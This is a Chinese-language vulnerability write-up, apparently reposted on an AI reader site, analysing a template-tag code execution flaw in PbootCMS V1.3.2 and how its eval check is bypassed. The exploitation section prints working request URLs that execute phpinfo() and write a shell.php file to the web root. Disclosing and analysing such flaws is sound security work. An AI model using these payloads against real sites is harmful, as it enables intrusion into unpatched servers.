我的安全梦 2024年07月24日
Pbootcms-V1.3.2版本前台代码执行
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

PbootCMS是一款由翱云科技开发的PHP企业网站管理系统,近期发现其存在安全漏洞。通过分析,漏洞存在于ParserController.php中的parserIfLabel函数,攻击者可利用该漏洞执行任意代码。本文详细介绍了漏洞的发现过程、利用方法以及防护措施。

🔍 PbootCMS的parserIfLabel函数存在安全漏洞,攻击者可以通过特定的输入绕过系统防护,执行任意代码。该漏洞源于对eval函数的调用处理不当,特别是对输入字符串的decode_string函数处理,导致反斜杠被错误地去除。

📝 漏洞利用方式简单,攻击者只需构造特定的URL请求,即可在服务器上执行任意PHP代码。例如,通过访问特定链接,可以直接执行phpinfo()函数,或者通过file_put_contents()函数在服务器上写入恶意文件。

🛡️ 对于该漏洞的防护,建议及时更新PbootCMS到最新版本,或者在服务器上实施相应的安全策略,如限制eval等危险函数的使用,以及对用户输入进行严格的过滤和验证。

详细介绍:

0x00 cms简介

PbootCMS是翱云科技开发的全新内核且永久开源免费PHP企业网站开发建设管理系统,是一款高效、简洁、 强悍的建站系统,能够满足各类企业网站开发建设的需要。系统采用高效...

下载地址:https://gitee.com/hnaoyun/PbootCMS/releases?c=2

0x01 漏洞分析

漏洞文件:\apps\home\controller\ParserController.php 中的parserIfLabel函数:


比上个版本的修复方式就是对eval判断不区分大小写了,但是这里却经过了一个decode_string函数处理:


可以看到这个作用就是去除反斜杠,如果我们传入:eval\($_GET[1])既不会满足上面的if条件,在传入eval操作时又去掉了其中的反斜杠eval($_GET[1])造成了代码执行。


找调用地方:


符合该处正则的模板:\template\default\productlist.html


0x02 漏洞利用

直接访问:http://xxx.com/index.php/list/5/?current={pboot:if(eval\($_GET[a]))}1{/pboot:if}&a=phpinfo();

即可直接造成代码执行。

写入shell Payload:

http://xxx.com/index.php/list/5/?current={pboot:if(eval\($_GET[a]))}1{/pboot:if}&a=file_put_contents('shell.php','<?php%20phpinfo();?>');

即可在根目录成功写入一个shell.php文件。

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

PbootCMS 安全漏洞 代码执行
相关文章